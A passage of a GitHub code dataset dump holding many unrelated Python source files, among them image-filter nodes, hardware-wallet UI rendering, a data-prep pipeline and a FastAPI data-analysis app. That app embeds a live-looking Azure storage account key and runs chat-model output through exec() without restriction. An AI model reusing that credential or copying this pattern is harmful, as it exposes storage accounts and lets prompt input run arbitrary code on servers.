machine/deep learning tasks\n \n @Params:\n ts: array of float\n The time series\n f_size: int\n The input window size\n offset: int\n The offset between the last value of the input window and the first value of the output window\n output_width:\n The output window size\n sum_: bool\n If true, the label to predict will be the sum of the values contained in the output window\n \n @Returns:\n X: array of float\n The input array containing the input windows\n Y: array of float\n The label array containing the output windows\n \"\"\"\n\n X, Y = [], []\n\n for i in range(len(ts) - f_size - offset - output_width):\n if (output_width == 1):\n Y.append(ts[i + f_size + offset])\n elif not sum_:\n Y.append(ts[i + f_size + offset:i + f_size + offset + output_width])\n else:\n Y.append(np.sum(ts[i + f_size + offset:i + f_size + offset + output_width]))\n X.append(ts[i:(i + f_size)])\n \n X, Y = np.array(X), np.array(Y)\n \n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\n if sum_: Y = np.reshape(Y, (Y.shape[0], 1))\n\n return X, Y\n\n","repo_name":"antoinethl/Research-work","sub_path":"app/source/_5_data_windowing/data_windowing.py","file_name":"data_windowing.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14248132222","text":"import random\n\n\nclass Combat:\n# define attributes common for attack and dodge\n\tmax_attack = 6\n\tmax_dodge = 6\n\n# define dodge behaviour\n\tdef dodge(self):\n\t\troll = random.randint(1, self.max_dodge)\n\t\tprint('Dodge roll: {}'.format(roll))\n\t\treturn roll > 4\n\n# define attack behaviour\n\n\tdef attack(self):\n\t\troll = random.randint(1, self.max_attack)\n\t\tprint('Attack roll: {}'.format(roll))\n\t\treturn roll > 4 # only return output if value of roll is greater than 4\n\t\n\n","repo_name":"JaminZoo/Treehouse","sub_path":"combat.py","file_name":"combat.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73447470543","text":"from __future__ import annotations\n\nfrom math import ceil\n\nimport cv2\nimport numpy as np\n\nfrom . import category as ImageFilterCategory\nfrom ...node_base import NodeBase\nfrom ...node_factory import NodeFactory\nfrom ...properties.inputs import ImageInput, NumberInput\nfrom ...properties.outputs import ImageOutput\nfrom ...utils.utils import get_h_w_c\n\n\n@NodeFactory.register(\"chainner:image:average_color_fix\")\nclass AverageColorFixNode(NodeBase):\n \"\"\"Fixes the average color of an upscaled image\"\"\"\n\n def __init__(self):\n super().__init__()\n self.description = \"\"\"Correct for upscaling model color shift by matching\n average color of Input Image to that of a smaller Reference Image.\n Using significant downscaling increases generalization of averaging effect\n and can reduce artifacts in the output.\"\"\"\n self.inputs = [\n ImageInput(\"Image\", channels=[3, 4]),\n ImageInput(\"Reference Image\", channels=[3, 4]),\n NumberInput(\n \"Reference Image Scale Factor\",\n precision=4,\n controls_step=12.5,\n maximum=100.0,\n default=12.5,\n unit=\"%\",\n ),\n ]\n self.outputs = [ImageOutput(image_type=\"Input0\")]\n self.category = ImageFilterCategory\n self.name = \"Average Color Fix\"\n self.icon = \"MdAutoFixHigh\"\n self.sub = \"Correction\"\n\n def run(\n self, input_img: np.ndarray, ref_img: np.ndarray, scale_factor: float\n ) -> np.ndarray:\n \"\"\"Fixes the average color of the input image\"\"\"\n\n if scale_factor != 100.0:\n # Make sure reference image dims are not resized to 0\n h, w, _ = get_h_w_c(ref_img)\n out_dims = (\n max(ceil(w * (scale_factor / 100)), 1),\n max(ceil(h * (scale_factor / 100)), 1),\n )\n\n ref_img = cv2.resize(\n ref_img,\n out_dims,\n interpolation=cv2.INTER_AREA,\n )\n\n input_h, input_w, input_c = get_h_w_c(input_img)\n ref_h, ref_w, ref_c = get_h_w_c(ref_img)\n\n assert (\n ref_w < input_w and ref_h < input_h\n ), \"Image must be larger than Reference Image\"\n\n # adjust channels\n alpha = None\n if input_c > ref_c:\n alpha = input_img[:, :, 3:4]\n input_img = input_img[:, :, :ref_c]\n elif ref_c > input_c:\n ref_img = ref_img[:, :, :input_c]\n\n # Find the diff of both images\n\n # Downscale the input image\n downscaled_input = cv2.resize(\n input_img,\n (ref_w, ref_h),\n interpolation=cv2.INTER_AREA,\n )\n\n # Get difference between the reference image and downscaled input\n downscaled_diff = ref_img - downscaled_input # type: ignore\n\n # Upsample the difference\n diff = cv2.resize(\n downscaled_diff,\n (input_w, input_h),\n interpolation=cv2.INTER_CUBIC,\n )\n\n result = input_img + diff\n\n # add alpha back in\n if alpha is not None:\n result = np.concatenate([result, alpha], axis=2)\n\n return np.clip(result, 0, 1)\n","repo_name":"orgTestCodacy11KRepos110MB/repo-1470-chaiNNer","sub_path":"backend/src/nodes/nodes/image_filter/avg_color_fix.py","file_name":"avg_color_fix.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28890813749","text":"from Newfoundland.Object import Object\nfrom Beagle import API as BGL\n\nclass DeadK(Object):\n def parse(od,df):\n DeadK.instance = DeadK(p=[od[\"x\"],od[\"y\"]])\n return DeadK.instance\n\n def customize(self):\n self.buftarget = \"popup\"\n self.size = [ 11.0,11.0 ]\n self.light_color = [ 1.0,0.6,0.6,1.0 ]\n self.light_radius = 20\n self.light_type = Object.LightTypes.DYNAMIC_SHADOWCASTER\n self.visible = True\n self.texture = BGL.assets.get(\"KT-forest/texture/deadk1\")\n self.tick_type = Object.TickTypes.STATIC\n self.z_index = 1\n #self.physics = { \"radius\" : 1.0, \"mass\" : 900, \"friction\" : 0.3 }\n\n def get_shader_params(self):\n sp = Object.get_shader_params(self)\n return sp\n","repo_name":"dzz/kthuune","sub_path":"src/Universe/LevelProps/DeadK.py","file_name":"DeadK.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21142152930","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nsys.setrecursionlimit(10**8)\n\ndef traverse(p, s):\n global fileCnt\n if p not in direction: return\n \n for f, c in direction[p]:\n if c == '0':\n if f not in s:\n s.add(f)\n fileCnt += 1\n else:\n traverse(f, s)\n return\n\n\nn, m = map(int, input().split())\ndirection = {}\n\nfor _ in range(n+m):\n p, f, c = input().split()\n if p not in direction:\n direction[p] = []\n direction[p].append([f, c])\n\n\nfor _ in range(int(input())):\n query = input().split('/')\n s = set()\n fileCnt = 0\n traverse(query[-1], s)\n \n print(len(s), fileCnt)\n","repo_name":"cpwoo/CodeTest","sub_path":"Python/boj/graph/22860.py","file_name":"22860.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19114869400","text":"class Student:\n # 这个属性直接定义在类里,是一个元组,用来规定对象可以存在的属性\n __slots__ = ('name', 'age', 'city')\n\n def __init__(self, x, y):\n self.name = x\n self.age = y\n\n def say_hello(self):\n print(\"大家好,我是\", self.name)\n\n\n# Student(\"张三\", 20)这段代码具体做了什么?\n# 1.调用__new__方法,用来申请内存空间\n# 2.调用__init__方法传入参数,将self指向创建好的内存空间,填充数据\n# 3.变量s1也指向创建好的内存空间\ns1 = Student(\"张三\", 20)\ns1.say_hello()\n\n# Student没有height会报错\n# print(s1.height)\n\n# 在没有定义slots属性的情况下,直接使用等号给一个属性赋值\n# 如果这个属性以前不存在,会给对象添加一个新的属性\n# 动态属性 若slots属性进行了定义,该属性不在slots的定义范围内,则不能进行添加操作,会报错\ns1.city = \"上海\"\nprint(s1.city)\ns2 = Student(\"Kevin\", 30)\ns2.say_hello()\nprint(s2.age)\n","repo_name":"zhaozhekey/Python-","sub_path":"Day11/代码/04-self语句的使用.py","file_name":"04-self语句的使用.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74342640782","text":"GNS = [\"ZRO\", \"ONE\", \"TWO\", \"THR\", \"FOR\", \"FIV\", \"SIX\", \"SVN\", \"EGT\", \"NIN\"]\nfor t in range(1, int(input()) + 1):\n tc = input().split()\n words = input().split()\n number = [0] * 10\n\n for word in words:\n for idx, element in enumerate(GNS):\n if element == word:\n number[idx] += 1\n break\n\n print(tc[0])\n\n for i in range(10):\n print((GNS[i] + ' ') * number[i], end=' ')\n print()","repo_name":"hyoonpark/Algorithm","sub_path":"SWEA/String/GNS2.py","file_name":"GNS2.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33302359945","text":"# Utils\nimport argparse\nimport glob\nfrom pathlib import Path\nimport yaml\nimport pandas as pd\n# Deep learning Stuff\nfrom torch.utils.data import DataLoader\nimport ttach as tta\n\n# Function Created by me\nfrom dataset import *\nfrom model import *\nfrom train_func import *\n\n\ndef main(cfg):\n test_df = pd.read_csv(cfg['test_file'])\n probabilitys = None\n seed_everything(cfg['seed'])\n gc.enable()\n device = return_device()\n test_df['file_path'] = test_df['Image_id'].apply(lambda x: return_filpath(x, folder=cfg['test_dir']))\n\n test_dataset = Cultivar_data_inference(image_path=test_df['file_path'],\n cfg=cfg,\n transform=get_train_transforms(cfg['image_size']),\n transform_rgn=get_train_transforms_rgn(cfg['image_size']))\n\n test_loader = DataLoader(\n test_dataset, batch_size=cfg['batch_size'], shuffle=False,\n num_workers=cfg['num_workers'], pin_memory=cfg['pin_memory']\n )\n\n for path in glob.glob(f\"{cfg['model_path']}/*.pth\"):\n model = BaseModelFeature(cfg)\n model.load_state_dict(torch.load(path))\n model = tta.ClassificationTTAWrapper(model, tta.aliases.flip_transform())\n\n model.to(device)\n model.eval()\n probablity = inference_fn(test_loader, model, cfg)\n\n if probabilitys is None:\n probabilitys = probablity / 5\n else:\n probabilitys += probablity / 5\n del model\n gc.collect()\n torch.cuda.empty_cache()\n blast = []\n brown = []\n healthy = []\n probabilitys = probabilitys.detach().cpu().numpy()\n for i in probabilitys:\n blast.append(i[0])\n brown.append(i[1])\n healthy.append(i[2])\n sub = pd.DataFrame({\"filename\": test_df['Image_id'], \"blast\": blast, \"brown\": brown, \"healthy\": healthy})\n np.save(cfg['probablity_file'], probabilitys, allow_pickle=True)\n sub.to_csv(cfg['submission_file'], index=False)\n\n\nif __name__ == '__main__' and '__file__' in globals():\n parser = argparse.ArgumentParser(description='Baseline')\n parser.add_argument(\"--file\", type=Path)\n args = parser.parse_args()\n with open(str(args.file), \"r\") as stream:\n config = yaml.safe_load(stream)\n main(config)\n","repo_name":"ZindiAfrica/Computer-Vision","sub_path":"Image Classification/Microsoft Rice Disease Classification Challenge/#9 Mithilsalunkhe/notebooks/src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"25057370063","text":"\"\"\"\nModule contains logging related functions and variables\n\"\"\"\n\nimport logging\nimport logging.config\n\nfrom config import Config\n\nlogging.config.fileConfig(Config.CONFIG_FILE)\nlogger = logging.getLogger()\n\n_LOGGERS = {\n 'kafka': Config.KAFKA_LOGGING_LEVEL,\n 'tornado': Config.TORNADO_LOGGING_LEVEL,\n 'matplotlib': Config.MATPLOTLIB_LOGGING_LEVEL\n}\n\n\ndef configure_lib_loggers() -> None:\n \"\"\"Function sets logging levels from config for external modules\"\"\"\n for log, level in _LOGGERS.items():\n lib_logger = logging.getLogger(log)\n lib_logger.setLevel(level)\n","repo_name":"kjuraszek/epd-rpi-controller","sub_path":"controller/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25015341354","text":"from enum import Enum\n\nfrom pyspark import keyword_only\nfrom pyspark.ml.param.shared import HasInputCol\nfrom pyspark.ml.param.shared import HasOutputCol\nfrom pyspark.ml.param.shared import Param\nfrom pyspark.ml.param.shared import Params\nfrom pyspark.ml.param.shared import TypeConverters\nfrom pyspark.ml.util import JavaMLReadable\nfrom pyspark.ml.util import JavaMLWritable\nfrom pyspark.ml.util import _jvm\nfrom pyspark.ml.wrapper import JavaTransformer\n\nfrom mleap.pyspark.py2scala import jvm_scala_object\nfrom mleap.pyspark.py2scala import ScalaNone\nfrom mleap.pyspark.py2scala import Some\n\n\nclass BinaryOperation(Enum):\n Add = 1\n Subtract = 2\n Multiply = 3\n Divide = 4\n Remainder = 5\n LogN = 6\n Pow = 7\n Min = 8\n Max = 9\n\n\nclass MathBinary(JavaTransformer, HasOutputCol, JavaMLReadable, JavaMLWritable):\n\n inputA = Param(\n Params._dummy(),\n \"inputA\",\n \"input for left side of binary operation\",\n typeConverter=TypeConverters.toString,\n )\n\n inputB = Param(\n Params._dummy(),\n \"inputB\",\n \"input for right side of binary operation\",\n typeConverter=TypeConverters.toString,\n )\n\n @keyword_only\n def __init__(\n self,\n operation=None,\n inputA=None,\n inputB=None,\n outputCol=None,\n defaultA=None,\n defaultB=None,\n ):\n \"\"\"\n Computes the mathematical binary `operation` over\n the input columns A and B.\n\n :param operation: BinaryOperation to specify the operation type\n :param inputA: column name for the left side of operation (string)\n :param inputB: column name for the right side of operation (string)\n :param outputCol: output column name (string)\n :param defaultA: Default to use instead of inputA. This will only be used\n when inputA is None. For example when defaultA=4,\n operation=BinaryOperation.Multiply and inputB=f1, then all entries of\n col f1 will be multiplied by 4.\n :param defaultB: Default to use instead of inputB. This will only be used\n when inputB is None. For example when defaultB=4,\n operation=BinaryOperation.Multiply and inputA=f1, then all entries of\n col f1 will be multiplied by 4.\n\n NOTE: `operation`, `defaultA`, `defaultB` is not a JavaParam because\n the underlying MathBinary scala object uses a MathBinaryModel to store\n the info about the binary operation.\n\n `operation` has a None default value even though it should *never* be\n None. A None value is necessary upon deserialization to instantiate a\n MathBinary without errors. Afterwards, pyspark sets the _java_obj to\n the deserialized scala object, which encodes the operation (as well\n as the default values for A and B).\n \"\"\"\n super(MathBinary, self).__init__()\n\n # if operation=None, it means that pyspark is reloading the model\n # from disk and calling this method without args. In such case we don't\n # need to set _java_obj here because pyspark will set it after creation\n #\n # if operation is not None, we can proceed to instantiate the scala classes\n if operation:\n scalaBinaryOperation = jvm_scala_object(\n _jvm().ml.combust.mleap.core.feature,\n f\"BinaryOperation${operation.name}$\"\n )\n\n scalaMathBinaryModel = _jvm().ml.combust.mleap.core.feature.MathBinaryModel(\n scalaBinaryOperation,\n Some(defaultA) if defaultA is not None else ScalaNone(),\n Some(defaultB) if defaultB is not None else ScalaNone(),\n )\n self._java_obj = self._new_java_obj(\n \"org.apache.spark.ml.mleap.feature.MathBinary\",\n self.uid,\n scalaMathBinaryModel,\n )\n\n self._setDefault()\n self.setParams(inputA=inputA, inputB=inputB, outputCol=outputCol)\n\n @keyword_only\n def setParams(self, inputA=None, inputB=None, outputCol=None):\n \"\"\"\n Sets params for this MathBinary.\n \"\"\"\n # For the correct behavior of MathBinary, params that are None must be unset\n kwargs = {k: v for k, v in self._input_kwargs.items() if v is not None}\n return self._set(**kwargs)\n\n def setInputA(self, value):\n \"\"\"\n Sets the value of :py:attr:`inputA`.\n \"\"\"\n return self._set(inputA=value)\n\n def setInputB(self, value):\n \"\"\"\n Sets the value of :py:attr:`inputB`.\n \"\"\"\n return self._set(inputB=value)\n\n def setOutputCol(self, value):\n \"\"\"\n Sets the value of :py:attr:`outputCol`.\n \"\"\"\n return self._set(outputCol=value)\n","repo_name":"combust/mleap","sub_path":"python/mleap/pyspark/feature/math_binary.py","file_name":"math_binary.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":1481,"dataset":"github-code","pt":"47"} +{"seq_id":"24005623103","text":"from google.appengine.ext import db\nfrom django.utils import simplejson\nfrom dict2xml import dict2xml\n\nclass Level(db.Model):\n ''' Defines a level'''\n \n # the word grid as a string. wrapped around by the client \n grid = db.StringProperty()\n # list of words available to be found in the grid \n word_bank = db.StringListProperty()\n # when this level is active \n time = db.DateTimeProperty()\n \n def to_xml(self):\n obj = {\"response\" : {\"level_id\": self.key().id(), \"grid\": self.grid, \"word_bank\" : {\"word\" : self.word_bank}, \"time\" : str(self.time.utcnow())}}\n return dict2xml(obj).to_string()\n \n def to_json(self):\n obj = {\"response\" : {\"level_id\": self.key().id(), \"grid\": self.grid, \"word_bank\" : self.word_bank, \"time\" : str(self.time.utcnow())}}\n return simplejson.dumps(obj)\n \n \nclass User(db.Model):\n ''' User for keeping track of scores and submissions '''\n name = db.StringProperty()\n\nclass Submission(db.Model):\n ''' When a level is completed by a user '''\n \n # submitting user \n user = db.ReferenceProperty(User)\n # score achieved for submission \n score = db.IntegerProperty()\n # time of submission \n time = db.DateTimeProperty()\n # list of words found in the session \n words_found = db.StringListProperty()\n # reference to the level object\n level = db.ReferenceProperty(Level)","repo_name":"akawry/seekword","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"27820839194","text":"from micropython import const\n\nfrom trezor import ui\n\nTEXT_HEADER_HEIGHT = const(48)\nTEXT_LINE_HEIGHT = const(26)\nTEXT_LINE_HEIGHT_HALF = const(13)\nTEXT_MARGIN_LEFT = const(14)\nTEXT_MAX_LINES = const(5)\n\n# needs to be different from all colors and font ids\nBR = const(-256)\nBR_HALF = const(-257)\n\n\ndef render_text(words: list, new_lines: bool, max_lines: int) -> None:\n # initial rendering state\n font = ui.NORMAL\n fg = ui.FG\n bg = ui.BG\n offset_x = TEXT_MARGIN_LEFT\n offset_y = TEXT_HEADER_HEIGHT + TEXT_LINE_HEIGHT\n OFFSET_X_MAX = ui.WIDTH\n OFFSET_Y_MAX = TEXT_HEADER_HEIGHT + TEXT_LINE_HEIGHT * max_lines\n FONTS = (ui.NORMAL, ui.BOLD, ui.MONO, ui.MONO_BOLD)\n\n # sizes of common glyphs\n SPACE = ui.display.text_width(\" \", font)\n DASH = ui.display.text_width(\"-\", ui.BOLD)\n ELLIPSIS = ui.display.text_width(\"...\", ui.BOLD)\n\n for word_index, word in enumerate(words):\n has_next_word = word_index < len(words) - 1\n\n if isinstance(word, int):\n if word in [BR, BR_HALF]:\n # line break or half-line break\n if offset_y >= OFFSET_Y_MAX:\n ui.display.text(offset_x, offset_y, \"...\", ui.BOLD, ui.GREY, bg)\n return\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT if word == BR else TEXT_LINE_HEIGHT_HALF\n elif word in FONTS:\n # change of font style\n font = word\n else:\n # change of foreground color\n fg = word\n continue\n\n width = ui.display.text_width(word, font)\n\n while offset_x + width > OFFSET_X_MAX or (\n has_next_word and offset_y >= OFFSET_Y_MAX\n ):\n beginning_of_line = offset_x == TEXT_MARGIN_LEFT\n word_fits_in_one_line = width < (OFFSET_X_MAX - TEXT_MARGIN_LEFT)\n if (\n offset_y < OFFSET_Y_MAX\n and word_fits_in_one_line\n and not beginning_of_line\n ):\n # line break\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT\n break\n # word split\n if offset_y < OFFSET_Y_MAX:\n split = \"-\"\n splitw = DASH\n else:\n split = \"...\"\n splitw = ELLIPSIS\n # find span that fits\n for index in range(len(word) - 1, 0, -1):\n letter = word[index]\n width -= ui.display.text_width(letter, font)\n if offset_x + width + splitw < OFFSET_X_MAX:\n break\n else:\n index = 0\n span = word[:index]\n # render word span\n ui.display.text(offset_x, offset_y, span, font, fg, bg)\n ui.display.text(offset_x + width, offset_y, split, ui.BOLD, ui.GREY, bg)\n # line break\n if offset_y >= OFFSET_Y_MAX:\n return\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT\n # continue with the rest\n word = word[index:]\n width = ui.display.text_width(word, font)\n\n # render word\n ui.display.text(offset_x, offset_y, word, font, fg, bg)\n\n if new_lines and has_next_word:\n # line break\n if offset_y >= OFFSET_Y_MAX:\n ui.display.text(offset_x, offset_y, \"...\", ui.BOLD, ui.GREY, bg)\n return\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT\n else:\n # shift cursor\n offset_x += width\n offset_x += SPACE\n\n\nclass Text(ui.Widget):\n def __init__(\n self,\n header_text: str,\n header_icon: str = ui.ICON_DEFAULT,\n icon_color: int = ui.ORANGE_ICON,\n max_lines: int = TEXT_MAX_LINES,\n new_lines: bool = True,\n ):\n self.header_text = header_text\n self.header_icon = header_icon\n self.icon_color = icon_color\n self.max_lines = max_lines\n self.new_lines = new_lines\n self.content = []\n\n def normal(self, *content):\n self.content.append(ui.NORMAL)\n self.content.extend(content)\n\n def bold(self, *content):\n self.content.append(ui.BOLD)\n self.content.extend(content)\n\n def mono(self, *content):\n self.content.append(ui.MONO)\n self.content.extend(content)\n\n def mono_bold(self, *content):\n self.content.append(ui.MONO_BOLD)\n self.content.extend(content)\n\n def br(self):\n self.content.append(BR)\n\n def br_half(self):\n self.content.append(BR_HALF)\n\n def render(self):\n if self.tainted:\n ui.header(\n self.header_text,\n self.header_icon,\n ui.TITLE_GREY,\n ui.BG,\n self.icon_color,\n )\n render_text(self.content, self.new_lines, self.max_lines)\n self.tainted = False\n","repo_name":"trezor/trezor-core","sub_path":"src/trezor/ui/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","stars":353,"dataset":"github-code","pt":"47"} +{"seq_id":"36976625484","text":"import os\r\nfrom fastapi import FastAPI, UploadFile, File\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom pydantic import BaseModel\r\nfrom azure.storage.blob import BlobServiceClient\r\nfrom io import BytesIO\r\nimport pandas as pd\r\nimport glob\r\nimport vertexai\r\nfrom vertexai.preview.language_models import ChatModel\r\nfrom google.auth import credentials\r\nfrom google.oauth2 import service_account\r\nimport google.cloud.aiplatform as aiplatform\r\nimport json\r\nimport io\r\nimport contextlib\r\n\r\n\r\napp = FastAPI()\r\n\r\n# Add CORS middleware\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\nclass Prompt(BaseModel):\r\n prompt: str\r\n filename: str\r\n\r\n@app.on_event(\"startup\")\r\nasync def startup_event():\r\n # Load the service account json file\r\n with open(\"participant-sa-26-ghc-025.json\") as f:\r\n service_account_info = json.load(f)\r\n\r\n my_credentials = service_account.Credentials.from_service_account_info(\r\n service_account_info\r\n )\r\n\r\n # Initialize Google AI Platform with project details and credentials\r\n aiplatform.init(credentials=my_credentials)\r\n\r\n with open(\"participant-sa-26-ghc-025.json\", encoding=\"utf-8\") as f:\r\n project_json = json.load(f)\r\n project_id = project_json[\"project_id\"]\r\n\r\n # Initialize Vertex AI with project and location\r\n vertexai.init(project=project_id, location=\"us-central1\")\r\n\r\ndef clean_python_code(code):\r\n # Remove Markdown backticks\r\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\")\r\n\r\n # Split the code by line breaks\r\n lines = code.split('\\n')\r\n\r\n # Remove only trailing whitespace from each line to preserve indentation\r\n lines = [line.rstrip() for line in lines]\r\n\r\n # Remove empty lines\r\n lines = [line for line in lines if line]\r\n\r\n # Join the lines back together\r\n cleaned_code = '\\n'.join(lines)\r\n\r\n return cleaned_code\r\n\r\n\r\n\r\n@app.post(\"/analyze\")\r\nasync def analyze_data(prompt: Prompt):\r\n # Azure Blob configurations\r\n connection_string = 'DefaultEndpointsProtocol=https;AccountName=mosistorage;AccountKey=E0h0nPOvoHKf50HoBg4vP7BBBTJ4eCnqqOWlURTbXiA5fbT/MuE0qcxUBDlNWdihlI76MzqQSaB3+ASt4/vpbg==;EndpointSuffix=core.windows.net'\r\n container_name = 'mosicsv'\r\n\r\n # Initialize BlobServiceClient\r\n blob_service_client = BlobServiceClient.from_connection_string(connection_string)\r\n\r\n # Download the CSV file from Azure Blob Storage\r\n csv_blob_client = blob_service_client.get_blob_client(container=container_name, blob=prompt.filename)\r\n csv_data = csv_blob_client.download_blob().readall()\r\n\r\n # Get the current directory path\r\n current_directory = os.getcwd()\r\n\r\n # Define the file destination path\r\n file_destination = os.path.join(current_directory, 'mosicsv', prompt.filename)\r\n\r\n # Create the 'mosicsv' directory if it doesn't exist\r\n os.makedirs(os.path.dirname(file_destination), exist_ok=True)\r\n\r\n # Save the downloaded CSV file to the file destination\r\n with open(file_destination, 'wb') as file:\r\n file.write(csv_data)\r\n\r\n # Convert the CSV file to a pandas DataFrame\r\n df = pd.read_csv(file_destination)\r\n\r\n # Get the head of the data as a preview\r\n data_preview = df.head().to_dict()\r\n\r\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\")\r\n parameters = {\r\n \"temperature\": 0.8,\r\n \"max_output_tokens\": 1024,\r\n \"top_p\": 0.8,\r\n \"top_k\": 40,\r\n }\r\n chat = chat_model.start_chat()\r\n print(\"Data Preview:\", data_preview)\r\n print(\"File Destination:\", file_destination)\r\n\r\n message_input = \"Here's the head of my data: \" + str(data_preview) + \". The CSV file is located at: \" + file_destination + \". Write only python code. Can you analyze it for me by \" + prompt.prompt\r\n\r\n chat_response = chat.send_message(message_input)\r\n\r\n # Clean the Python code\r\n cleaned_code = clean_python_code(chat_response.text)\r\n\r\n print(\"Uncleaned Code:\", chat_response.text)\r\n print(\"Cleaned code:\", cleaned_code)\r\n # Write cleaned Python code to a file\r\n python_code_filepath = \"temp.py\"\r\n with open(python_code_filepath, 'w') as python_file:\r\n python_file.write(cleaned_code)\r\n\r\n # Create a string buffer\r\n output = io.StringIO()\r\n # Initialize result variable\r\n result = None\r\n # Redirect standard output to the string buffer\r\n with contextlib.redirect_stdout(output):\r\n try:\r\n exec(cleaned_code)\r\n # If a .png file has been generated in the current directory, upload it to Azure\r\n if glob.glob(\"*.png\"):\r\n image_file = glob.glob(\"*.png\")[0]\r\n image_blob_client = blob_service_client.get_blob_client(container=container_name, blob=image_file)\r\n with open(image_file, \"rb\") as data:\r\n image_blob_client.upload_blob(data)\r\n os.remove(image_file)\r\n result = {\"image_url\": image_blob_client.url}\r\n except Exception as e:\r\n result = {\"error\": str(e)}\r\n\r\n # Get the print output\r\n printed_output = output.getvalue().strip()\r\n # Clean up the temporary files\r\n os.remove(python_code_filepath)\r\n\r\n if result is None:\r\n result = {\"text_response\": chat_response.text}\r\n\r\n # Add the printed_output to the result\r\n result[\"printed_output\"] = printed_output\r\n return result\r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\r\n","repo_name":"MarkNwilliam/Semilog","sub_path":"backend/lablab.py","file_name":"lablab.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73116814863","text":"# -*- coding: utf-8 -*-\r\n#This file includes pipeline to prepare the document for analysis\r\n#functions used here can be found in prep_utilities.py file\r\n\r\nfrom src.prep_utilities import *\r\n\r\n#Pipeline for data prep\r\ndef prep_docs(doc, speaker_attributes, fix_contract = True, del_stop = True, lemmatize = True, print_progress = True, min_size = 1, min_true_size = 1):\r\n \"\"\"\r\n This function performs the full pipeline to prepare the data taken from Quotebank\r\n \r\n Parameters\r\n ----------\r\n doc : pandas.DataFrame\r\n Dataframe with the data to pre-process.\r\n speaker_attributes : pandas.DataFrame\r\n Dataframe with informations on the speakers.\r\n fix_contract : bool\r\n If true, expand contractions (don't -> do not; I'm -> I am;...)\r\n del_stop : bool\r\n If true, remove all stopwords.\r\n lemmatize : bool\r\n If true, lemmatize all words.\r\n \r\n Returns\r\n -------\r\n copy_doc : pandas.DataFrame\r\n Result of the data provided after having passed through the whole pipeline.\r\n \"\"\"\r\n \r\n # Delete rows with 'None' speaker\r\n if print_progress: print(\"Deleting rows with 'None' speaker...\")\r\n copy_doc = doc[doc['speaker'] != 'None']\r\n\r\n # get date in YYYY-MM format\r\n if print_progress: print(\"Simplifying date column...\")\r\n copy_doc['date'] = copy_doc['date'].apply(lambda x: get_yyyy_mm(x))\r\n\r\n # prepare clean tokens\r\n if print_progress: print(\"Tokenizing quotes...\")\r\n copy_doc['tokens'] = copy_doc['quotation'].apply(\r\n lambda x: prep_tokens_row(x, fix_contract, del_stop, lemmatize))\r\n\r\n # filter out unnecessary rows (by number of words/true words)\r\n if print_progress: print(\"Filtering rows...\")\r\n copy_doc = filter_quotes(copy_doc, min_size, min_true_size)\r\n\r\n # get domain names\r\n if print_progress: print(\"Getting url domains...\")\r\n copy_doc['websites'] = copy_doc['urls'].apply(lambda x: get_website(x))\r\n copy_doc.drop(columns='urls', inplace=True)\r\n\r\n # get the gender of the speaker\r\n if print_progress: print(\"Getting genders...\")\r\n copy_doc['gender'] = copy_doc['qids'].apply(lambda x: find_gender(x, speaker_attributes))\r\n\r\n # Drop rows with gender = 'None'\r\n copy_doc = copy_doc[copy_doc['gender'].apply(lambda x: type(x)) != type(None)]\r\n\r\n return copy_doc\r\n","repo_name":"epfl-ada/ada-2021-project-madam","sub_path":"src/prep_pipeline.py","file_name":"prep_pipeline.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25545483865","text":"import os\nimport xml.etree.cElementTree as ET\nfrom typing import List, Optional, Iterable, Callable, Tuple, NamedTuple, Set\n\nfrom nltk.corpus import wordnet as wn\nfrom xml.dom import minidom\n\n\ndef wn_sense_key_to_id(sense_key):\n synset = wn.lemma_from_key(sense_key).synset()\n return 'wn:' + str(synset.offset()).zfill(8) + synset.pos()\n\n\n_wn2bn = {}\n_bn2wn = 